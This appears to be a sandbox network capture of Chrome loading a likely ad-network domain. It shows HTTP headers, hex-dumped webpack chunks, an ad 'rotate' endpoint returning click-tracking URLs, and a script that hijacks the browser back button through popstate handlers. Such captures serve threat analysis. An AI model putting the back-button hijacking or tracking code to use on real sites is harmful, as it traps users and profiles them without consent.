                                                                                                          2025-01-06 11:09:24 UTC391INData Raw: 31 38 30 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 31 35 30 34 5d 2c 7b 31 31 35 30 34 3a 66 75 6e 63 74 69 6f 6e 28 41 2c 65 2c 74 29 7b 74 2e 72 28 65 29 2c 65 2e 64 65 66 61 75 6c 74 3d 7b 73 72 63 3a 22 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 6d 5f 34 35 2e 64 34 62 34 62 32 33 61 2e 77 65 62 70 22 2c 68 65 69 67 68 74 3a 35 31 32 2c 77 69 64 74 68 3a 35 31 32 2c 62 6c 75 72 44 61 74 61 55 52 4c 3a 22 64 61 74 61 3a 69 6d 61 67 65 2f 77 65 62 70 3b 62 61 73 65 36 34 2c 55 6b 6c 47 52 6c 6f 41 41 41 42 58 52 55 4a 51 56 6c 41 34 49 45 34 41 41 41 41 51 41 67
                                                                                                          Data Ascii: 180"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[11504],{11504:function(A,e,t){t.r(e),e.default={src:"/_next/static/media/m_45.d4b4b23a.webp",height:512,width:512,blurDataURL:"data:image/webp;base64,UklGRloAAABXRUJQVlA4IE4AAAAQAg
                                                                                                          2025-01-06 11:09:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          82192.168.2.450130104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:24 UTC638OUTGET /_next/static/chunks/55b75effc428db6e-1736072686539.cbe69f590e8fc565.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
                                                                                                          2025-01-06 11:09:24 UTC495INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:24 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-178"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1057
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:24 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb41736b6019b6-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:24 UTC383INData Raw: 31 37 38 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 37 33 37 31 38 5d 2c 7b 37 33 37 31 38 3a 66 75 6e 63 74 69 6f 6e 28 41 2c 65 2c 74 29 7b 74 2e 72 28 65 29 2c 65 2e 64 65 66 61 75 6c 74 3d 7b 73 72 63 3a 22 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 66 5f 34 38 2e 35 38 34 63 34 33 35 33 2e 77 65 62 70 22 2c 68 65 69 67 68 74 3a 35 31 32 2c 77 69 64 74 68 3a 35 31 32 2c 62 6c 75 72 44 61 74 61 55 52 4c 3a 22 64 61 74 61 3a 69 6d 61 67 65 2f 77 65 62 70 3b 62 61 73 65 36 34 2c 55 6b 6c 47 52 6c 51 41 41 41 42 58 52 55 4a 51 56 6c 41 34 49 45 67 41 41 41 44 51 41 51
                                                                                                          Data Ascii: 178"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[73718],{73718:function(A,e,t){t.r(e),e.default={src:"/_next/static/media/f_48.584c4353.webp",height:512,width:512,blurDataURL:"data:image/webp;base64,UklGRlQAAABXRUJQVlA4IEgAAADQAQ
                                                                                                          2025-01-06 11:09:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          83192.168.2.450132104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:24 UTC470OUTGET /_next/static/media/icon-survey.86b78ce0.svg HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
                                                                                                          2025-01-06 11:09:24 UTC499INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:24 GMT
                                                                                                          Content-Type: image/svg+xml
                                                                                                          Content-Length: 2652
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: "677a5f14-a5c"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 988
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:24 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Accept-Ranges: bytes
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb4173ae09c470-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:24 UTC870INData Raw: 3c 73 76 67 20 68 65 69 67 68 74 3d 22 35 31 32 22 20 77 69 64 74 68 3d 22 35 31 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 66 66 22 20 64 3d 22 4d 34 34 35 20 31 36 37 2e 33 36 34 63 34 2e 31 34 33 20 30 20 37 2e 35 2d 33 2e 33 35 37 20 37 2e 35 2d 37 2e 35 56 31 30 37 2e 35 63 30 2d 31 32 2e 34 30 36 2d 31 30 2e 30 39 34 2d 32 32 2e 35 2d 32 32 2e 35 2d 32 32 2e 35 68 2d 37 2e 35 56 36 35 63 30 2d 31 32 2e 34 30 36 2d 31 30 2e 30 39 34 2d 32 32 2e 35 2d 32 32 2e 35 2d 32 32 2e 35 68 2d 37 2e 35 76 2d 32 30 43 33 39 32 2e 35 20 31 30 2e 30 39 34 20 33 38 32 2e 34 30 36 20 30 20 33 37 30 20 30 48 38 32 43 36 39 2e 35 39 33 20 30 20 35 39 2e 35
                                                                                                          Data Ascii: <svg height="512" width="512" xmlns="http://www.w3.org/2000/svg"><path fill="#fff" d="M445 167.364c4.143 0 7.5-3.357 7.5-7.5V107.5c0-12.406-10.094-22.5-22.5-22.5h-7.5V65c0-12.406-10.094-22.5-22.5-22.5h-7.5v-20C392.5 10.094 382.406 0 370 0H82C69.593 0 59.5
                                                                                                          2025-01-06 11:09:24 UTC1369INData Raw: 2d 31 30 2e 30 39 34 20 32 32 2e 35 2d 32 32 2e 35 76 2d 33 34 37 68 37 2e 35 63 34 2e 31 33 36 20 30 20 37 2e 35 20 33 2e 33 36 34 20 37 2e 35 20 37 2e 35 76 33 38 32 63 30 20 34 2e 31 33 36 2d 33 2e 33 36 34 20 37 2e 35 2d 37 2e 35 20 37 2e 35 68 2d 34 38 2e 33 31 39 63 2d 34 2e 31 34 33 20 30 2d 37 2e 35 20 33 2e 33 35 37 2d 37 2e 35 20 37 2e 35 73 33 2e 33 35 37 20 37 2e 35 20 37 2e 35 20 37 2e 35 48 34 30 30 63 31 32 2e 34 30 36 20 30 20 32 32 2e 35 2d 31 30 2e 30 39 34 20 32 32 2e 35 2d 32 32 2e 35 56 31 30 30 68 37 2e 35 63 34 2e 31 33 36 20 30 20 37 2e 35 20 33 2e 33 36 34 20 37 2e 35 20 37 2e 35 76 35 32 2e 33 36 34 63 30 20 34 2e 31 34 33 20 33 2e 33 35 37 20 37 2e 35 20 37 2e 35 20 37 2e 35 7a 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66
                                                                                                          Data Ascii: -10.094 22.5-22.5v-347h7.5c4.136 0 7.5 3.364 7.5 7.5v382c0 4.136-3.364 7.5-7.5 7.5h-48.319c-4.143 0-7.5 3.357-7.5 7.5s3.357 7.5 7.5 7.5H400c12.406 0 22.5-10.094 22.5-22.5V100h7.5c4.136 0 7.5 3.364 7.5 7.5v52.364c0 4.143 3.357 7.5 7.5 7.5z"/><path fill="#f
                                                                                                          2025-01-06 11:09:24 UTC413INData Raw: 2e 35 2d 33 68 2d 31 32 30 63 2d 34 2e 31 34 32 20 30 2d 37 2e 35 20 33 2e 33 35 37 2d 37 2e 35 20 37 2e 35 73 33 2e 33 35 38 20 37 2e 35 20 37 2e 35 20 37 2e 35 68 31 32 30 63 34 2e 31 34 33 20 30 20 37 2e 35 2d 33 2e 33 35 37 20 37 2e 35 2d 37 2e 35 73 2d 33 2e 33 35 37 2d 37 2e 35 2d 37 2e 35 2d 37 2e 35 7a 6d 30 20 33 32 68 2d 31 32 30 63 2d 34 2e 31 34 32 20 30 2d 37 2e 35 20 33 2e 33 35 37 2d 37 2e 35 20 37 2e 35 73 33 2e 33 35 38 20 37 2e 35 20 37 2e 35 20 37 2e 35 68 31 32 30 63 34 2e 31 34 33 20 30 20 37 2e 35 2d 33 2e 33 35 37 20 37 2e 35 2d 37 2e 35 73 2d 33 2e 33 35 37 2d 37 2e 35 2d 37 2e 35 2d 37 2e 35 7a 6d 2d 33 38 2d 33 31 35 68 2d 31 33 38 63 2d 31 33 2e 37 38 35 20 30 2d 32 35 20 31 31 2e 32 31 35 2d 32 35 20 32 35 73 31 31 2e 32 31 35
                                                                                                          Data Ascii: .5-3h-120c-4.142 0-7.5 3.357-7.5 7.5s3.358 7.5 7.5 7.5h120c4.143 0 7.5-3.357 7.5-7.5s-3.357-7.5-7.5-7.5zm0 32h-120c-4.142 0-7.5 3.357-7.5 7.5s3.358 7.5 7.5 7.5h120c4.143 0 7.5-3.357 7.5-7.5s-3.357-7.5-7.5-7.5zm-38-315h-138c-13.785 0-25 11.215-25 25s11.215


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          84192.168.2.450131104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:24 UTC497OUTGET /_next/static/chunks/265d60a91fd3d6b8-1736072686539.748820502fe4525b.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
                                                                                                          2025-01-06 11:09:24 UTC495INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:24 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-ec3"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1057
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:24 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb4173cd324390-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:24 UTC874INData Raw: 65 63 33 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 33 38 39 30 34 5d 2c 7b 35 30 36 35 36 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 29 7b 72 2e 64 28 6e 2c 7b 4e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 76 7d 7d 29 3b 76 61 72 20 74 3d 72 28 31 32 31 33 39 29 2c 6f 3d 72 28 36 31 36 35 36 29 2c 61 3d 72 28 38 33 32 31 36 29 2c 69 3d 72 28 37 31 39 36 31 29 2c 63 3d 72 28 33 35 31 34 37 29 2c 75 3d 72 28 32 31 38 31 38 29 2c 73 3d 72 28 35 31 36 35 39 29 2c 6c 3d 72 28 39 34 33 39 37 29 2c 64 3d 72 28 31 39 34 39 35 29 2c 66 3d 5b 22 63 6f 61 6a 75 74 6f 61 2e 63 6f
                                                                                                          Data Ascii: ec3"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[38904],{50656:function(e,n,r){r.d(n,{N:function(){return v}});var t=r(12139),o=r(61656),a=r(83216),i=r(71961),c=r(35147),u=r(21818),s=r(51659),l=r(94397),d=r(19495),f=["coajutoa.co
                                                                                                          2025-01-06 11:09:24 UTC1369INData Raw: 61 72 20 6c 2c 64 2c 76 2c 62 2c 45 3d 6e 75 6c 6c 21 3d 3d 28 6c 3d 6b 2e 62 61 63 6b 2e 68 69 73 74 6f 72 79 54 69 6d 65 41 6d 6f 75 6e 74 29 26 26 76 6f 69 64 20 30 21 3d 3d 6c 3f 6c 3a 33 2c 6d 3d 6e 75 6c 6c 3d 3d 3d 28 74 3d 6b 2e 62 61 63 6b 2e 7a 6f 6e 65 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 66 69 6e 64 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 74 79 70 65 3d 3d 3d 75 2e 77 2e 62 61 63 6b 7d 29 29 3b 69 66 28 6d 29 76 3d 28 30 2c 73 2e 6b 36 29 28 75 2e 77 2e 62 61 63 6b 29 2c 64 3d 6d 3b 65 6c 73 65 20 64 3d 6e 75 6c 6c 3d 3d 3d 28 62 3d 6b 2e 62 61 63 6b 2e 7a 6f 6e 65 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 62 3f 76 6f 69 64 20 30 3a 62 2e 66 69 6e 64 28 28 66 75 6e 63 74 69 6f 6e 28
                                                                                                          Data Ascii: ar l,d,v,b,E=null!==(l=k.back.historyTimeAmount)&&void 0!==l?l:3,m=null===(t=k.back.zones)||void 0===t?void 0:t.find((function(e){return e.type===u.w.back}));if(m)v=(0,s.k6)(u.w.back),d=m;else d=null===(b=k.back.zones)||void 0===b?void 0:b.find((function(
                                                                                                          2025-01-06 11:09:24 UTC1369INData Raw: 73 68 20 73 74 61 74 65 2c 20 65 72 72 6f 72 3a 22 2c 6f 29 7d 7d 28 22 2f 62 61 63 6b 3f 22 2e 63 6f 6e 63 61 74 28 4e 29 2c 45 2c 72 29 7d 65 6c 73 65 28 30 2c 69 2e 79 4e 29 28 22 5a 6f 6e 65 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 20 69 73 20 6e 6f 74 20 65 6e 61 62 6c 65 64 22 29 29 3b 65 6c 73 65 20 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 5a 6f 6e 65 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 20 6e 6f 74 20 66 6f 75 6e 64 22 29 29 7d 7d 7d 7d 7d 2c 33 38 39 30 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 29 7b 72 2e 72 28 6e 29 3b 76 61 72 20 74 3d 72 28 31 32 31 33 39 29 2c 6f 3d 72 28 31 37 39 36 39 29 2c 61 3d 72 28 37 31 39 36 31 29 2c 69 3d 72 28 32 36 36 34 30 29 2c 63 3d 72 28 32 31 38 31 38 29 2c 75 3d 72 28 37 32 31 38 31 29 2c 73 3d 72
                                                                                                          Data Ascii: sh state, error:",o)}}("/back?".concat(N),E,r)}else(0,i.yN)("Zone ".concat(e," is not enabled"));else console.error("Zone ".concat(e," not found"))}}}}},38904:function(e,n,r){r.r(n);var t=r(12139),o=r(17969),a=r(71961),i=r(26640),c=r(21818),u=r(72181),s=r
                                                                                                          2025-01-06 11:09:24 UTC174INData Raw: 75 72 72 65 6e 74 54 61 62 55 72 6c 3a 72 7d 29 29 29 7d 3b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 70 6f 70 73 74 61 74 65 22 2c 73 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 70 6f 70 73 74 61 74 65 22 2c 73 29 7d 7d 7d 29 2c 5b 76 2e 6f 61 69 64 2c 76 2e 75 73 65 72 44 61 74 61 2e 73 75 62 49 64 2c 76 2e 61 64 65 78 2e 73 74 61 74 75 73 5d 29 2c 6e 75 6c 6c 7d 7d 7d 5d 29 3b 0d 0a
                                                                                                          Data Ascii: urrentTabUrl:r})))};return window.addEventListener("popstate",s),function(){window.removeEventListener("popstate",s)}}}),[v.oaid,v.userData.subId,v.adex.status]),null}}}]);
                                                                                                          2025-01-06 11:09:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          85192.168.2.450135104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:24 UTC739OUTGET /rotate?var=8645117&ymid=615-538bd0d9&click_id=900090192959910233&rhd=1&var_3=M7456757949717807127&oaid=1zy28050kovbfyyc4yz4gsq62pkmaxhb&os_version=10.0.0&btz=America%2FNew_York&bto=300&zz=4292526%3B5128285%3B4326653%3B4949467%3B5381235%3B8372416%3B5381316%3B8372719%3B5381307&uid=1zy28050kovbfyyc4yz4gsq62pkmaxhb HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
                                                                                                          2025-01-06 11:09:24 UTC950INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:24 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Vary: Accept-Encoding
                                                                                                          X-Trace-Id: 61965ddbc60a99e8076144c7f16b4940
                                                                                                          Accept-Ch: Sec-CH-UA, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model
                                                                                                          Access-Control-Allow-Origin: https://wungoangeredsa.com/
                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Allow-Headers: Accept, Content-Type, Content-Length, Accept-Encoding, baggage, sentry-trace
                                                                                                          Pragma: no-cache
                                                                                                          Cache-Control: no-transform, no-store, no-cache, must-revalidate, max-age=0
                                                                                                          Expires: Tue, 11 Jan 1994 10:00:00 GMT
                                                                                                          Timing-Allow-Origin: *
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb4173a88242f4-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:24 UTC419INData Raw: 39 64 33 0d 0a 7b 22 61 64 73 22 3a 5b 7b 22 63 6c 69 63 6b 22 3a 22 68 74 74 70 73 3a 2f 2f 77 75 6e 67 6f 61 6e 67 65 72 65 64 73 61 2e 63 6f 6d 2f 77 65 6e 32 35 74 76 68 2f 34 32 30 39 39 34 32 3f 76 61 72 3d 38 36 34 35 31 31 37 5c 75 30 30 32 36 79 6d 69 64 3d 36 31 35 2d 35 33 38 62 64 30 64 39 5c 75 30 30 32 36 63 6c 69 63 6b 5f 69 64 3d 39 30 30 30 39 30 31 39 32 39 35 39 39 31 30 32 33 33 5c 75 30 30 32 36 72 68 64 3d 31 5c 75 30 30 32 36 76 61 72 5f 33 3d 4d 37 34 35 36 37 35 37 39 34 39 37 31 37 38 30 37 31 32 37 5c 75 30 30 32 36 6f 73 5f 76 65 72 73 69 6f 6e 3d 31 30 2e 30 2e 30 5c 75 30 30 32 36 62 74 7a 3d 41 6d 65 72 69 63 61 25 32 46 4e 65 77 5f 59 6f 72 6b 5c 75 30 30 32 36 62 74 6f 3d 33 30 30 5c 75 30 30 32 36 75 73 65 72 49 64 3d 31
                                                                                                          Data Ascii: 9d3{"ads":[{"click":"https://wungoangeredsa.com/wen25tvh/4209942?var=8645117\u0026ymid=615-538bd0d9\u0026click_id=900090192959910233\u0026rhd=1\u0026var_3=M7456757949717807127\u0026os_version=10.0.0\u0026btz=America%2FNew_York\u0026bto=300\u0026userId=1
                                                                                                          2025-01-06 11:09:24 UTC1369INData Raw: 3d 31 5c 75 30 30 32 36 76 61 72 5f 33 3d 4d 37 34 35 36 37 35 37 39 34 39 37 31 37 38 30 37 31 32 37 5c 75 30 30 32 36 6f 73 5f 76 65 72 73 69 6f 6e 3d 31 30 2e 30 2e 30 5c 75 30 30 32 36 62 74 7a 3d 41 6d 65 72 69 63 61 25 32 46 4e 65 77 5f 59 6f 72 6b 5c 75 30 30 32 36 62 74 6f 3d 33 30 30 5c 75 30 30 32 36 75 73 65 72 49 64 3d 31 7a 79 32 38 30 35 30 6b 6f 76 62 66 79 79 63 34 79 7a 34 67 73 71 36 32 70 6b 6d 61 78 68 62 22 7d 2c 7b 22 63 6c 69 63 6b 22 3a 22 68 74 74 70 73 3a 2f 2f 77 75 6e 67 6f 61 6e 67 65 72 65 64 73 61 2e 63 6f 6d 2f 77 65 6e 32 35 74 76 68 2f 34 32 39 32 36 37 34 3f 76 61 72 3d 38 36 34 35 31 31 37 5c 75 30 30 32 36 79 6d 69 64 3d 36 31 35 2d 35 33 38 62 64 30 64 39 5c 75 30 30 32 36 63 6c 69 63 6b 5f 69 64 3d 39 30 30 30 39 30
                                                                                                          Data Ascii: =1\u0026var_3=M7456757949717807127\u0026os_version=10.0.0\u0026btz=America%2FNew_York\u0026bto=300\u0026userId=1zy28050kovbfyyc4yz4gsq62pkmaxhb"},{"click":"https://wungoangeredsa.com/wen25tvh/4292674?var=8645117\u0026ymid=615-538bd0d9\u0026click_id=900090
                                                                                                          2025-01-06 11:09:24 UTC734INData Raw: 33 33 5c 75 30 30 32 36 72 68 64 3d 31 5c 75 30 30 32 36 76 61 72 5f 33 3d 4d 37 34 35 36 37 35 37 39 34 39 37 31 37 38 30 37 31 32 37 5c 75 30 30 32 36 6f 73 5f 76 65 72 73 69 6f 6e 3d 31 30 2e 30 2e 30 5c 75 30 30 32 36 62 74 7a 3d 41 6d 65 72 69 63 61 25 32 46 4e 65 77 5f 59 6f 72 6b 5c 75 30 30 32 36 62 74 6f 3d 33 30 30 5c 75 30 30 32 36 75 73 65 72 49 64 3d 31 7a 79 32 38 30 35 30 6b 6f 76 62 66 79 79 63 34 79 7a 34 67 73 71 36 32 70 6b 6d 61 78 68 62 22 7d 2c 7b 22 63 6c 69 63 6b 22 3a 22 68 74 74 70 73 3a 2f 2f 77 75 6e 67 6f 61 6e 67 65 72 65 64 73 61 2e 63 6f 6d 2f 77 65 6e 32 35 74 76 68 2f 38 33 37 32 38 35 34 3f 76 61 72 3d 38 36 34 35 31 31 37 5c 75 30 30 32 36 79 6d 69 64 3d 36 31 35 2d 35 33 38 62 64 30 64 39 5c 75 30 30 32 36 63 6c 69 63
                                                                                                          Data Ascii: 33\u0026rhd=1\u0026var_3=M7456757949717807127\u0026os_version=10.0.0\u0026btz=America%2FNew_York\u0026bto=300\u0026userId=1zy28050kovbfyyc4yz4gsq62pkmaxhb"},{"click":"https://wungoangeredsa.com/wen25tvh/8372854?var=8645117\u0026ymid=615-538bd0d9\u0026clic
                                                                                                          2025-01-06 11:09:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          86192.168.2.450134104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:24 UTC497OUTGET /_next/static/chunks/593553c1eec4cbba-1736072686539.97c2038dc0b2daf0.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
                                                                                                          2025-01-06 11:09:24 UTC495INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:24 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-17c"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1057
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:24 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb4173ca428c2d-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
